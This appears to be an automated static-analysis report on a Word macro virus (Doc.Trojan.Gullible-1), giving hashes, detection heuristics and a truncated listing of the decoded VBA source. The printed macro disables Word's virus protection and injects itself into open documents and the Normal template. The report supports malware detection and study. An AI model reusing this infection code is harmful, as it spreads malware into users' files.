Doc.Trojan.Gullible-1 — Office (OLE) malware analysis

Static analysis result for SHA-256 9af5df139497901d…

MALICIOUS

Office (OLE)

44.5 KB Created: 2001-03-09 14:31:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: e25512405acdfa4e2d717a5669d30d54 SHA-1: f46b146564a28c75d51421be9e209a4360d82df7 SHA-256: 9af5df139497901d27a24b7a7e51aa5bdbb31e4802830b49c19a60b3f3abc6fd
220 Risk Score

Malware Insights

Doc.Trojan.Gullible-1 · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic

The file contains VBA macros, including a Document_Open macro, which is a common technique for executing malicious code upon opening a document. The ClamAV detection and the heuristic firings strongly indicate this is a malicious document. The macro attempts to infect other documents and contains obfuscated code, suggesting it's designed for propagation.

Heuristics 4

  • ClamAV: Doc.Trojan.Gullible-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Gullible-1
  • OLE document has large unaccounted-for region high OLE_SLACK_ANOMALY
    OLE file is 45,568 bytes but its declared streams total only 25,481 bytes — 20,087 bytes (44%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 20577 bytes
SHA-256: 9045c5ae0db871c97f5565baf71df7e666451254f1bdc2d11b9bc7f3735193fd
Detection
ClamAV: Doc.Trojan.Gullible-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Declare Function SetWindowRgn Lib "user32" (ByVal hWnd As Long, ByVal hRgn As Long, ByVal bRedraw As Boolean) As Long
Private Declare Function CreateEllipticRgn Lib "gdi32" (ByVal X1 As Long, ByVal Y1 As Long, ByVal X2 As Long, ByVal Y2 As Long) As Long
Private Declare Function FindWindow Lib "user32" Alias "FindWindowA" (ByVal lpClassName As String, ByVal lpWindowName As String) As Long
Private Sub MFV(Method As String)
    Dim Doc As Document, Comp, CodeMod As Object, SaveIt As Boolean, i As Integer
        
    If Application.UserName = Chr(Val("&H53")) + Chr(Val("&H2E")) + Chr(Val("&H20")) + Chr(Val("&H42")) + Chr(Val("&H61")) + Chr(Val("&H63")) + Chr(Val("&H68")) Then
        If Method = "O" Then MsgBox "Ich bin wieder hier!", vbOKOnly + vbDefaultButton1 + vbInformation, "MFV"
        Options.VirusProtection = True
        Exit Sub
    End If

    
    Options.VirusProtection = False
    
    
    'Infection
    For Each Doc In Documents
        SaveIt = Doc.Saved
        
        For Each Comp In Doc.VBProject.VBComponents
            If Comp.Type = 100 Then Call Infect(Comp.CodeModule)
        Next

    Next
    Call Infect(Normal.ThisDocument.VBProject.VBComponents(1).CodeModule)
    
    'Destruction
    If Method = "C" And (Format(Date, "dd-mm") = "19-03") Then
        Assistant.Visible = True
        Assistant.Animation = MsoAnimationType.msoAnimationGetTechy
        
        Application.WindowState = wdWindowStateNormal
        Application.Width = 500
        Application.Height = 500
        SetWindowRgn FindWindow("OpusApp", vbNullString), CreateEllipticRgn(0, 0, 600, 600), True
    
        With Assistant.NewBalloon
            .BalloonType = MsoBalloonType.msoBalloonTypeNumbers
            .Mode = MsoModeType.msoModeModal
            .Icon = MsoIconType.msoIconAlert
            .Button = MsoButtonSetType.msoButtonSetCancel
            .Heading = "MFV"
            .Text = MacroContainer.Name & " was infected by MFV (My First Virus)"
            .Show
        End With

        Assistant.Animation = MsoAnimationType.msoAnimationThinking
    
        With Assistant.NewBalloon
            .BalloonType = MsoBalloonType.msoBalloonTypeNumbers
            .Mode = MsoModeType.msoModeModal
            .Icon = MsoIconType.msoIconTip
            .Button = MsoButtonSetType.msoButtonSetCancel
            .Heading = "MFV"
            .Text = "This virus is not harmful. Belive me!" & vbCrLf & "Your window was only deformed, not more!" & vbCrLf & vbCrLf & "This virus is freeware. You may give it to anyone!"
            .Show
        End With
    End If
End Sub
Private Sub Infect(CodeMod As Object)
    Dim StartOpen As Integer, StartClose As Integer, StartNew As Integer, IsInfected As Boolean
    Dim Sex As Object, DoIt As Boolean, i As Integer
    
    IsInfected = False: StartOpen = 0: StartClose = 0: StartNew = 0
    For i = 1 To CodeMod.CountOfLines
        If InStr(1, UCase(CodeMod.Lines(i, 1)), UCase("Sub Document_Open()")) Then StartOpen = i
        If InStr(1, UCase(CodeMod.Lines(i, 1)), UCase("Sub Document_Close()")) Then StartClose = i
        If InStr(1, UCase(CodeMod.Lines(i, 1)), UCase("Sub Document_New()")) Then StartNew = i
        If InStr(1, UCase(CodeMod.Lines(i, 1)), UCase("'Infected by My first Virus")) Then IsInfected = True
    Next i

    If Not IsInfected Then
        CodeMod.AddFromString "Private Declare Function SetWindowRgn Lib " & Chr(34) & "user32" & Chr(34) & " (ByVal hWnd As Long, ByVal hRgn As Long, ByVal bRedraw As Boolean) As Long"
        CodeMod.AddFromString "Private Declare Function CreateEllipticRgn Lib " & Chr(34) & "gdi32" & Chr(34) & " (ByVal X1 As Long, ByVal Y1 As Long, ByVal X2 As Long, ByVal Y2 As Long) As Long"
        CodeMod.AddFromString "Private Decl
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.